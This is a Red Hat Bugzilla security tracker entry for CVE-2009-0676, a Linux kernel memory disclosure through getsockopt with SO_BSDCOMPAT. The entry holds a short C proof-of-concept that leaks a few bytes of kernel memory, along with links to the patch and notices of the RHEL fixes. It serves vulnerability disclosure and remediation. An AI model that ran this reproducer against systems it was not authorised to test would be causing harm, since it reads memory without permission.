Bug 486305 - (CVE-2009-0676) CVE-2009-0676 kernel: memory disclosure in SO_BSDCOMPAT gsopt
CVE-2009-0676 kernel: memory disclosure in SO_BSDCOMPAT gsopt
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
medium Severity medium
: ---
: ---
Assigned To: Red Hat Product Security
public=20090211,source=lkml,reported=...
: Security
Depends On: 486514 486515 486516 486517 486518
Blocks:
  Show dependency treegraph
 
Reported: 2009-02-19 05:18 EST by Eugene Teo (Security Response)
Modified: 2011-09-30 19:36 EDT (History)
10 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2011-09-30 19:36:24 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)
Upstream patch (1.38 KB, patch)
2009-02-19 05:32 EST, Eugene Teo (Security Response)
no flags Details | Diff

  None (edit)
Description Eugene Teo (Security Response) 2009-02-19 05:18:20 EST
From Clement Lecigne:
In function sock_getsockopt() located in net/core/sock.c, optval v.val is not correctly initialized and directly returned in userland in case we have SO_BSDCOMPAT option set.

This dummy code should trigger the bug:

int main(void)
{
	unsigned char buf[4] = { 0, 0, 0, 0 };
	int len;
	int sock;
	sock = socket(33, 2, 2);
	getsockopt(sock, 1, SO_BSDCOMPAT, &buf, &len);
	printf("%x%x%x%x\n", buf[0], buf[1], buf[2], buf[3]);
	close(sock);
}

References:
http://lkml.org/lkml/2009/2/11/374
http://lkml.org/lkml/2009/2/12/123
http://patchwork.kernel.org/patch/6816/
Comment 3 Eugene Teo (Security Response) 2009-02-19 23:50:21 EST
This is a small infoleak. Do test the return values of socket() and getsockopt() in your testcase. You should be able to see the warning "process 'reproducer' is using obsolete getsockopt SO_BSDCOMPAT" in /var/log/messages.

sock = socket(2, 2, 0);
err = getsockopt(sock, 1 /* SOL_SOCKET */, SO_BSDCOMPAT, &buf, &len);

SYSCALL_DEFINE5(getsockopt, int, fd, int, level, int, optname,
                char __user *, optval, int __user *, optlen)
{
[...]
                if (level == SOL_SOCKET)
                        err =
                            sock_getsockopt(sock, level, optname, optval,
                                            optlen);
Comment 4 Eugene Teo (Security Response) 2009-02-23 21:32:02 EST
net: amend the fix for SO_BSDCOMPAT gsopt infoleak
http://marc.info/?l=linux-kernel&m=123540732700371&w=2
http://marc.info/?l=linux-netdev&m=123543237010175&w=2
Comment 7 Eugene Teo (Security Response) 2009-03-19 00:11:24 EDT
CVSS2 score of low, 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
Comment 8 errata-xmlrpc 2009-03-26 20:14:47 EDT
This issue has been addressed in following products:

  MRG for RHEL-5

Via RHSA-2009:0360 https://rhn.redhat.com/errata/RHSA-2009-0360.html
Comment 9 errata-xmlrpc 2009-04-01 04:30:59 EDT
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5

Via RHSA-2009:0326 https://rhn.redhat.com/errata/RHSA-2009-0326.html
Comment 11 errata-xmlrpc 2009-04-30 17:25:03 EDT
This issue has been addressed in following products:

  Red Hat Enterprise Linux 4

Via RHSA-2009:0459 https://rhn.redhat.com/errata/RHSA-2009-0459.html

Note You need to log in before you can comment on or make changes to this bug.